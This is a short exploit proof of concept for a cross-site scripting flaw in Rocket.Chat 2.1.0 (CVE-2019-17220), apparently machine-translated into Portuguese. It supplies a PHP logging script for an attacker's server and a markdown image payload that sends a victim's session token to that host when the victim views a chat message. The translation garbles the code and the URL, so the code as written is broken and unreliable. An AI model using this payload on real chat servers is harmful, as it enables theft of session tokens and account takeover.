Rocket.Chat 2.1.0 – Cross-Site Scripting

# Title: Rocket.Chat 2.1.0 – Script entre sites
# Autor: 3H34N
# Data: 2019-10-22
# Produto: Rocket.Chat
# Fornecedor: https://rocket.chat/
# Versões vulneráveis: Rocket.Chat <2.1.0
# CVE: CVE-2019-17220
# Agradecimentos especiais: Ali razmjoo, Mohammad Reza Espargham (@rezesp)

# PoC
# 1. Crie l33t.php em um servidor web

<? php
$ output = fopen (“logs.txt”, “a +”) ou die (“WTF? o.O”);
$ leet = $ _GET [‘leet’]. “\ n \ n”;
fwrite ($ output, $ leet);
fclose ($ output);
?>

# 2. Abra uma sessão de bate-papo
# 3. Envie carga útil com o URL do servidor da web

! [title] (http: //10.10.1.5/l33t.php? leet = + `{} token`)

# 4. O token será gravado em logs.txt quando o destino visualizar sua mensagem.

11 de novembro de 2019

LOGIN

Rocket.Chat 2.1.0 – Cross-Site Scripting

Rocket.Chat 2.1.0 – Cross-Site Scripting